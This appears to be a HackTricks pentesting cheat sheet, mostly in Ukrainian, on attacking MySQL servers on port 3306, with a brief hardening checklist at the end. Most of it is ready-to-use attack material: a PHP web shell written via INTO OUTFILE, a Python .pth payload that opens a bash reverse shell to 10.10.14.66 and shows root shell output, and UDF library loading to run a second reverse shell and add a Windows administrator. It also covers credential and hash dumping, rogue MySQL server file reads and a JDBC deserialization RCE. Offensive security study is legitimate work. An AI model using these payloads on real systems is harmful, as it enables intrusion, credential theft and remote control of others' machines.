3306 - Pentesting Mysql

Reading time: 17 minutes

Основна інформація

MySQL — це відкрита система управління реляційними базами даних (Relational Database Management System — RDBMS), яка доступна безкоштовно. Вона працює на мові структурованих запитів (SQL) і дозволяє керувати та маніпулювати базами даних.

Порт за замовчуванням: 3306

3306/tcp open  mysql

Підключення

Локально

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Віддалено

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Зовнішня Enumeration

Деякі з enumeration дій вимагають дійсних credentials

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Запис будь-яких бінарних даних

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL команди

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Перелічення дозволів MySQL

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

You can see in the docs the meaning of each privilege: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

MySQL File priv to SSRF/RCE

INTO OUTFILE → Python .pth RCE (специфічні для сайту конфігураційні хуки)

Зловживаючи класичним примітивом INTO OUTFILE, можна отримати виконання довільного коду на цілях, які пізніше запускають Python скрипти.

1. Використовуйте INTO OUTFILE щоб записати власний файл .pth в будь-який каталог, який автоматично підвантажується site.py (наприклад, .../lib/python3.10/site-packages/).
2. Файл .pth може містити один рядок, що починається з import і далі довільний Python-код, який виконуватиметься при кожному запуску інтерпретатора.
3. Коли інтерпретатор неявно виконується CGI-скриптом (наприклад /cgi-bin/ml-draw.py з shebang #!/bin/python), payload виконується з тими ж привілеями, що і процес веб-сервера (FortiWeb запускав це як root → повний pre-auth RCE).

Example .pth payload (single line, no spaces can be included in the final SQL payload, so hex/UNHEX() or string concatenation may be required):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Приклад створення файлу через UNION query (символи пробілів замінені на /**/, щоб bypass фільтр пробілів sscanf("%128s") і зберегти загальну довжину ≤128 байт):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Важливі обмеження та обхідні шляхи:

• INTO OUTFILE не може перезаписувати існуючі файли; виберіть нове ім'я файлу.
• Шлях до файлу розв'язується відносно MySQL’s CWD, тому префікс ../../ допомагає скоротити шлях і обійти обмеження абсолютних шляхів.
• Якщо введення атакуючого витягується за допомогою %128s (або подібного), будь-який пробіл обріже payload; використовуйте послідовності коментарів MySQL /**/ або /*!*/, щоб замінити пробіли.
• Користувач MySQL, що виконує запит, потребує привілею FILE, але в багатьох appliances (e.g. FortiWeb) сервіс працює як root, що дає можливість запису майже будь-куди.

Після скидання .pth просто зробіть запит до будь-якого CGI, який обробляє python interpreter, щоб отримати виконання коду:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

Процес Python автоматично імпортує шкідливий .pth і виконає shell payload.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL arbitrary read file by client

Насправді, коли ви намагаєтеся load data local into a table, MySQL або MariaDB сервер просить клієнта прочитати вміст файлу і відправити його. Тоді, якщо ви зможете змінити mysql client так, щоб він підключився до вашого власного MySQL server, ви зможете прочитати arbitrary files.
Зверніть увагу, що така поведінка спостерігається при використанні:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Зверніть увагу на слово "local")
Тому без "local" ви можете отримати:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Початковий PoC: https://github.com/allyshka/Rogue-MySql-Server
У цій статті ви можете знайти повний опис атаки та навіть як розширити її до RCE: https://paper.seebug.org/1113/
Тут можна знайти огляд атаки: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Mysql User

Особливо цікаво, якщо mysql запущено під root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Небезпечні параметри mysqld.cnf

У конфігурації сервісів MySQL використовуються різні налаштування для визначення його роботи та заходів безпеки:

• Налаштування user використовується для вказання користувача, від імені якого буде виконуватися служба MySQL.
• password застосовується для встановлення пароля, пов'язаного з користувачем MySQL.
• admin_address вказує IP-адресу, яка прослуховує TCP/IP-з'єднання на адміністративному мережевому інтерфейсі.
• Змінна debug вказує на поточні налаштування налагодження, які можуть включати конфіденційну інформацію в логах.
• sql_warnings керує тим, чи генеруються інформаційні рядки для одно-рядкових INSERT-запитів при виникненні попереджень, що може призводити до включення конфіденційних даних у логи.
• За допомогою secure_file_priv обмежується область операцій імпорту та експорту даних для підвищення безпеки.

Ескалація привілеїв

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation via library

Якщо mysql server is running as root (або інший користувач з більшими привілеями), ви можете змусити його виконувати команди. Для цього потрібно використовувати user defined functions. А щоб створити user defined функцію, вам потрібна бібліотека для ОС, на якій запущено mysql.

Зловмисну бібліотеку можна знайти всередині sqlmap та metasploit, виконавши locate "*lib_mysqludf_sys*". Файли .so — це бібліотеки для linux, а .dll — для Windows, виберіть ту, яка вам потрібна.

Якщо у вас немає цих бібліотек, ви можете або шукати їх, або завантажити цей linux C code і скомпілювати його на вразливій машині під linux:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Тепер, коли у вас є бібліотека, увійдіть у Mysql як привілейований користувач (root?) і виконайте наступні кроки:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Порада для Windows: створення директорій за допомогою NTFS ADS з SQL

На NTFS ви можете змусити створення директорії, використовуючи alternate data stream, навіть коли є лише примітив запису файлу. Якщо класичний UDF-ланцюг очікує директорію plugin, але вона не існує, а @@plugin_dir невідомий або заблокований, ви можете спочатку створити її за допомогою ::$INDEX_ALLOCATION:

SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory

Це перетворює обмежений SELECT ... INTO OUTFILE на більш повноцінний примітив у Windows-стеках, створюючи необхідну структуру папок для UDF drops.

Отримання облікових даних MySQL з файлів

Всередині /etc/mysql/debian.cnf можна знайти пароль у відкритому тексті користувача debian-sys-maint

cat /etc/mysql/debian.cnf

Ви можете використати ці облікові дані, щоб увійти в mysql базу даних.

Всередині файлу: /var/lib/mysql/mysql/user.MYD ви можете знайти всі хеші користувачів MySQL (ті, які можна витягти з mysql.user всередині бази даних).

Ви можете витягнути їх, виконавши:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Увімкнення логування

Ви можете увімкнути логування запитів mysql у файлі /etc/mysql/my.cnf, розкоментувавши наступні рядки:

Корисні файли

Файли конфігурації

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Історія команд
• ~/.mysql.history
• Файли логів
• connections.log
• update.log
• common.log

Бази даних/таблиці MySQL за замовчуванням

Автоматичні команди HackTricks

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

2023-2025 Основні моменти (нове)

JDBC propertiesTransform deserialization (CVE-2023-21971)

З Connector/J <= 8.0.32 атакуючий, який може впливати на JDBC URL (наприклад у сторонньому ПЗ, яке запитує рядок підключення), може вимагати завантаження довільних класів на сторону клієнта через параметр propertiesTransform. Якщо на class-path присутній завантажуваний gadget, це призводить до remote code execution у контексті JDBC client (pre-auth, оскільки не потрібні дійсні облікові дані). Мінімальний PoC виглядає так:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Запуск Evil.class може бути настільки простим, як розміщення його в class-path вразливої програми або дозволити rogue MySQL server надіслати шкідливий серіалізований об'єкт. Проблему виправлено в Connector/J 8.0.33 — оновіть драйвер або явно встановіть propertiesTransform в allow-list. (Див. Snyk write-up для деталей)

Атаки Rogue / Fake MySQL server проти JDBC клієнтів

Кілька open-source інструментів реалізують частковий протокол MySQL з метою атакувати JDBC клієнтів, які встановлюють зовнішні з'єднання:

• mysql-fake-server (Java, підтримує читання файлів та експлойти десеріалізації)
• rogue_mysql_server (Python, схожі можливості)

Типові шляхи атаки:

1. Вразлива програма завантажує mysql-connector-j з allowLoadLocalInfile=true або autoDeserialize=true.
2. Атакуючий контролює DNS / запис хосту, щоб hostname БД вказував на машину під його контролем.
3. Зловмисний сервер відповідає сформованими пакетами, які викликають або LOCAL INFILE для довільного читання файлів, або Java десеріалізацію → RCE.

Приклад однорядкової команди для запуску fake server (Java):

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Потім вкажіть цільовий додаток на jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true і прочитайте /etc/passwd, закодувавши ім'я файлу в base64 у username полі (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Cracking caching_sha2_password hashes

MySQL ≥ 8.0 зберігає хеші паролів як $mysql-sha2$ (SHA-256). Як Hashcat (mode 21100), так і John-the-Ripper (--format=mysql-sha2) підтримують offline cracking з 2023 року. Злийте колонку authentication_string і передайте її напряму:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Чекліст жорсткого захисту (2025)

• Встановіть LOCAL_INFILE=0 та --secure-file-priv=/var/empty, щоб вимкнути більшість примітивів читання/запису файлів. • Видаліть привілей FILE з облікових записів додатків. • У Connector/J встановіть allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (порожнє). • Вимкніть невикористовувані плагіни автентифікації та require TLS (require_secure_transport = ON). • Слідкуйте за CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL та раптовими SET GLOBAL запитами.

Джерела

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• The Art of PHP: CTF‑born exploits and techniques

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)